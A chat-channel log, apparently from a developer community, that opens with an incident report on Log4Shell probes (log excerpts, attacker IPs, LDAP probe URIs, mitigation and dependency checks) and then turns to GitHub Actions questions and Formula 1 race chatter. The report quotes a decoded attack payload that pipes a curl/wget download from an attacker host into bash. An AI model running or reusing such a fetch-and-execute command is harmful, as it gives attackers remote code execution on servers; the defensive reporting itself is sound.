2021-12-11
An experience report on the log4j2 issue -- I already posted this on another Slack where there was a very active discussion about the vulnerability:
> According to our Apache logs, we've been seeing probes for this exploit since 10/Dec/2021:09:22:16 +0000 (that's UTC) and while most have seemed to be "straightforward" LDAP queries back to mostly Russian servers with no payload, presumably just to test whether JNDI lookup was succeeding via logging, we've also seen some requests in this format:
access_log:45.155.205.233 - - [10/Dec/2021:18:22:04 +0000] "GET / HTTP/1.1" 302 132 "-" "${jndi:}"
which did not get logged via log4j2 but decodes to
(curl -s 45.155.205.233:5874/x.x.x.x:80||wget -q -O- 45.155.205.233:5874/x.x.x.x:80)|bash
where x.x.x.x is the server's public IP address -- so, if executed, that would download and run an arbitrary shell script on your server!
> All our servers were running log4j2 2.14.1 already so we added `-Dlog4j2.formatMsgNoLookups=true` as a JVM option and restarted everything.
> Our next production build will include log4j2 2.15.0 for everything.
> It looks like the ports used in the LDAP requests are rotating. So I assume the attacking program starts a listener on a random port, probes a remote server sending that port number, waits for an appropriate time for a response, and then shuts down the listener and switches to a new port. We were seeing multiple requests from the same IP addresses, specifying the same LDAP hosts (using a different IP address), with multiple ports.
> One batch of probes used this LDAP URI <ldaps://d71f9297.probe001.log4j.leakix.net:12042> where the prefix segment before .probe001 was a random hex string. Again, rotating listeners to make it harder to figure out what the probe was doing.
> All the early probes came from this IP 128.14.102.187 (a Russian server). The fancy http://leakix.net stuff came from 167.71.13.196 (which is running on Digital Ocean). Some of the Basic/Command probes came from 45.137.21.9 (Bangladesh), others from 45.155.205.233 (Russia).
I too saw the curl bash probe attempt, crazy stuff
Thank you for sharing. I've x-posted to a couple of other slacks (with attribution, of course).
really baffled by why log4j people thought it's a good default behavior to do lookups inside of %m for stuff that can trigger network activity
who even thinks of such madness 🙂
whilst many run newer jvm versions that don't execute remote java code, the machines with vulnerable log4j versions are still a massive array of DDoS boxes (you can nuke themselves by specifying non existing ldap targets or nuke others by telling that their :443 or :80 is the ldap server)
at times like these though it is good if you have been very strict on keeping codebase up to date and deployable so you can roll out the log4j update even to hundreds of microservices quickly
The defaults in "newer jvm versions" only suppress some vectors, as I understand it. There are still lookups-by-default enabled for this current CVE on modern JDKs -- at least that's what I get from a lot of the security analyses...
But, yeah, opting people into arbitrary code substitution by default seems like a spectacularly bad decision.
When t.d.a. added the prep-lib stuff, my first thought was "why doesn't it do it automatically for me?" and then I thought "hmm, arbitrary code execution" and realized it was probably a really good idea that you get a list of libs that expect you to "prep" them and you have to opt into that explicitly so you can review what they actually do. Not that we already examine every new dependency we add to projects in general I guess, despite the "launch missiles" possibility of automatically executed initialization code... 🤷
So the probing started maybe 24 hours ago, making this truly a "zero-day" exploit and it certainly includes at least some explicit RCE attempts.
is `lein deps :tree | grep log4j` sufficient to tell if we're running a vulnerable version?
yes You can automate it as well with https://github.com/rm-hull/nvd-clojure in case your dep tree changes in a future (or new CVEs pop up, oc)
Any idea why `lein deps :tree | grep log4j` would return no results, but `jar tf uberjar.jar | grep log4j` shows that log4j was included?
profiles matter, try something like `lein with-profile -user,-dev,+uberjar deps :tree`
or whatever profile combination is closer to production / your uberjarring process
I have a pretty extensive test matrix which I'd want to add as a GH status check. Can't one add the whole GH Actions workflow instead of each job individually?
https://github.blog/2021-11-29-github-actions-reusable-workflows-is-generally-available/
not sure if that has to do, my problem is that when I'm in the Branch protection rule page I have to add every single job from the matrix as a status check. If the matrix has 30 items total I have to click around 30 times, there has to be a better way
Final qualifying for formula 1 in the books. Championship leaders are exactly tied and it's a heads up race winner takes all.
I'm sure it will be a casual start tomorrow. Will be interesting to see how the tire start plays out
Yeah that flat spot might be incredibly important. Hope we have a clean getaway. And hopefully checo can stay in the mix
But the race pace of the Mercedes' might prove too much. Maybe a two stop strategy and a late charge to the finish
I hope max can do it but I doubt it. He should have had it wrapped up by now if not for a puncture, being punted off by Hamilton and being punted off by Bottas.
Oscar piastri has been incredible in his rookie F2 season, sealing the championship with five consecutive pole positions. If you have F1 tv you can watch the whole F2 and F3 seasons. And they are great racing
I'm actually happy that both drivers are on different strategies. This will spice things up. Not sure if my heart rate can get any higher but it will be exciting!
Hamilton is not just lucky, he's an amazing driver. I'm team Red Bull but respect to him
100%. He is incredible. Such a good driver the queen knighted him and as far as I know the only driver to be active when a part of a track was named after him. I'm hoping he does what he has always done, and hope that max and Red Bull can rise to that high bar and take the last championship in these regulations
what a freaking end, omg
gonna be fighting about this for a long time
i wanted max to win, but I've never seen a race in 20+ years where they only allow n cars to unlap themselves to intentionally allow 2 cars to get close at front
yeah, that was crazy
I mean, I can see race control wanting to set up a situation where the two clear leaders get to dog fight but hard to say it was "fair"
Hamilton just sitting in his car
oh there might be a legitimate protest. only 5 cars were allowed to unlap, not the whole field
I didn't understand why they retired perez?
it would be great to see Ferrari and McLaren more regularly in the top mix and not just Merc and RB
i'm hoping for a better mix of performance next year in addition to closer following due to aero changes. I've really enjoyed F2 and F3 for this reason
checo did the best lap at 5+ seconds off the pace and holding lewis behind. that was absolutely amazing
those two rules are procedure for resuming race after safety car and passing a car under safety car
i don't think the protest against max will go anywhere. i don't think anyone has any idea what to do about the protest against the race resumption
Overtaking under the safety car protest is dismissed https://twitter.com/msportxtra/status/1470097033579188232?s=21
I think if winning the title was decided over something as petty as that Mercedes would have looked really bad
One of the commentators on sky mentioned that Merc might threaten to leave if they aren't given the championship
If that's true, I wouldn't believe anything red bull says, it just means this gets sorted in court over the next few months
Just hope it doesn't drag on till next season. Regardless of who wins in the end, I don't think this is good for the sport
I can't imagine a world championship decided in court, by lawyers arguing over the meaning of a certain phrase in some paragraph buried in 100s of pages of regulations
Mercedes have notified they will appeal. Apparently the procedure is 48 hours of gathering data and putting together a case. I don't know which authority it goes to though. FIA or some higher sports authority
Unless we lose, then we appeal and win it in the court, you know given how dominant Merc have been for so long, it's kinda embarrassing to see them losing this badly.
Interesting theory I saw online about Checo's retirement. Pure speculation but a guess his car was only fueled for 3/4 of the race distance to improve his pace. Complete speculation but I'm in awe and it sounds like something Horner could try
anyway, I'm glad max won. but the race directing and stewarding has been appalling the last few races
I’m aware of a maximum fuel limit and max fuel flow rate. Never have heard of a minimum except for a required 0.7 liter fuel sample required of all cars classified. And if you plan on retiring doesn't seem applicable
Log4J is on the Mars Rover 2020 helicopter: https://twitter.com/TheASF/status/1400875147163279374
So the first interplanetary pwnage is up for grabs, but the latency is going to be a PITA 😝
Sounds like the next plot line (or should I say ... exploit line) for Star Trek Discovery https://youtu.be/A7B_ZWQFsYI